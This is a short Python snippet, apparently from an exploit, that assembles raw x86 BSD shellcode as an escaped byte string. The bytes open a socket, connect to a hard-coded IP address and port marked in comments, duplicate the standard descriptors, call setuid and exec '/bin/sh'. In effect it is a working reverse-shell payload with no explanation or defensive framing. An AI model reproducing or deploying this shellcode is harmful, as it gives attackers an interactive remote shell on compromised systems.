sc =  "\x31\xc9\x51\x41"
sc += "\x51\x41\x51\x51"
sc += "\x31\xc0\xb0\x61"
sc += "\xcd\x80\x89\x07"
sc += "\x31\xc9\x88\x4f"
sc += "\x04\xc6\x47\x05"
sc += "\x02\xc7\x47\x08"
sc += "\xc0\xa8\x01\x45" #ipaddr
sc += "\x66\xc7\x47\x06"
sc += "\x1b\x39\x6a\x10" #port
sc += "\x8d\x47\x04\x50"
sc += "\x8b\x07\x50\x50"
sc += "\x31\xc0\xb0\x62"
sc += "\xcd\x80\x31\xc9"
sc += "\x51\x8b\x07\x50"
sc += "\x50\x31\xc0\xb0"
sc += "\x5a\xcd\x80\x41"
sc += "\x83\xf9\x03\x75"
sc += "\xef\x31\xc9\x51"
sc += "\x51\x31\xc0\xb0"
sc += "\x17\xcd\x80\xeb"
sc += "\x23\x5b\x89\x1f"
sc += "\x31\xc9\x88\x4b"
sc += "\x07\x89\x4f\x04"
sc += "\x51\x8d\x07\x50"
sc += "\x8b\x07\x50\x50"
sc += "\x31\xc0\xb0\x3b"
sc += "\xcd\x80\x31\xc9"
sc += "\x51\x51\x31\xc0"
sc += "\xb0\x01\xcd\x80"
sc += "\xe8\xd8\xff\xff"
sc += "\xff\x2f\x62\x69"
sc += "\x6e\x2f\x73\x68"
sc += "\x41"
